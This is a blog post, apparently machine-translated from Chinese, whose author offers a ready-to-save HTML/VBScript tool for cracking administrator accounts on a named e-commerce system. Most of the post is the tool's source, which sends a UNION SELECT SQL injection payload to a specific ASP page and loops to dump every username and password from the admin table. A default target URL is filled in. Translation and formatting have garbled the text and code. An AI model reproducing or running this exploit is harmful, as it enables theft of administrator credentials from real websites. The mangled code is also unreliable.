/**
CI-Qin Strong
Http://blog.csdn.net/cqq
*/
Since the last time I wrote an Providence business system to crack the program,
Received a lot of letters from friends,
There are inquiries about the principle of the program, have asked how to protect.
Today, I took a little time to do this HTML version, just this one HTM file
Believe that a bit of HTML knowledge and SQL injection knowledge of friends can read
The principle is very simple, cracked user account is used SQL injection method,
Because there are a lot of SQL injection vulnerabilities in this system,
Then you download the system, you can easily find out the problem.
It used to be the VC version, now it's HTML, but it's all the same,
is to get the source file of the Web page through the HTTP protocol
Then analyze the source file, locate the username and password
and show it.
The following is the source code, we just save this file to the hard disk, called ty.htm, it can be.
<ptml> <pead> <meta http-equiv= "Content-type" content= "text/html; charset=gb2312 "> <title> Providence Business System admin admin account to crack HTML version--ci diligence strong production </title> <script Language =" VbScript "> Function Bytes2bstr (vin) Strreturn = "" For i = 1 to LenB (vIn) Thischarcode = AscB (MidB (vin,i,1)) If Thischarcode < &h80 Then Strreturn = strreturn & Chr (thischarcode) Else Nextcharcode = AscB (MidB (vin,i+1,1)) Strreturn = Strreturn & Chr (CLng (thischarcode) * &h100 + CInt (nextcharcode)) i = i + 1 end If Next bytes2 BSTR = Strreturn End Function Sub openurl (strurl) strtmp = "" struser = "!" STRAAA = "" strcqq= "" I=0 on Error Resume Next while Trim (struser) <> "Strpara ="/wlyx/show_cgal.asp?new SID=1%20AND%201=2%20UNION%20SELECT%201,USERNAME%2B ' * * *%2bpassword,3,4,5,6%20from%20manage_user%20where% 20username> ' "+ struser +" '%20union%20select%20*%20from%20cgal%20where%201=2 "Set xmlhttp = CreateObject (" MicroSoft. XMLHTTP ") Xmlhttp.open" Get ", (strURL + Strpara), False Xmlhttp.send Straaa=getmid (bytes2bstr. Responsebody), "<title>", "</title>") If Trim (STRAAA) <> "" Then arr = Split (STRAAA, "* *") struser = arr (0) strcqq = strcqq + vbNewLine + "Username:" + struser + vbnewline + "Password:" + arr (1) + Vbne Wline + vbnewline Else struser = "" "End If//msgbox xmlhttp. Response Set xmlhttp = Nothing wend If strcqq<> "Then strcqq=" cracked the background Management account number: (Background default address: "+strurl+"/admin) "+vbcr Lf+vbcrlf+strcqq+vbnewline cqqadmin.innertext=strcqq Else cqqadmin.innertext= "error" End-If end Sub Fun Ction getmid (str, STR1, str2) Str11 = "" I = InStr (str, str1) If i > 0 Then j = InStr (i, STR, s TR2) If j > 0 Then str11 = Mid (str, i + len (str1), J-i-Len (str1)) End If End If Getmid = Str11 End Function </script> <style type= "Text/css" > <!--body,td,th {font-size:9pt; }--> </style></pead> <body> <table width= "border=" 1 "align=" center "cellpadding=" 2 "c ellspacing= "0" bordercolor= "#D4D4D4" bgcolor= "#E4E4E4" > <tr> <td width= "39%" > Providence Business System admin account crack HTML version ;/td> <td align= ' right ' >powered by Steven_cee Http://blog.csdn.net/cqq </td> </tr> </tabl e> <table width= "border=" 0 "align=" center "cellpadding=" 0 "cellspacing=" 0 "> <tr> <td> ; <form name= "FRMCQQ" method= "POST" > <input name= "url" type= "text" value= "http://www.3shopok.net" size= "44" > <input type= "button" name= "Submit" value= "Submit" onclick= "Vbscript:openurl (window.frmCqq.url.value)" > </ form> </td> </tr> </table> <table width= "border=" 0 "align=" center "cellpadding=" 0 "cel lspacing= "0" > <tr> <td width= "a" > ≪/td> <td><span id= "cqqadmin" ></span></td> </tr> </table> <table Widt H= "border=" "1" align= "center" cellpadding= "1" cellspacing= "0" bordercolor= "#E4E4E4" bgcolor= "#E4E4E4" > <tr& Gt <TD align= "center" > Help note, see </td> </tr> </table> <p> </p> <p> < ;/p> <p> </p> </body> </ptml>
[Ctrl + A All SELECT Note: If the need to introduce external JS need to refresh to perform]
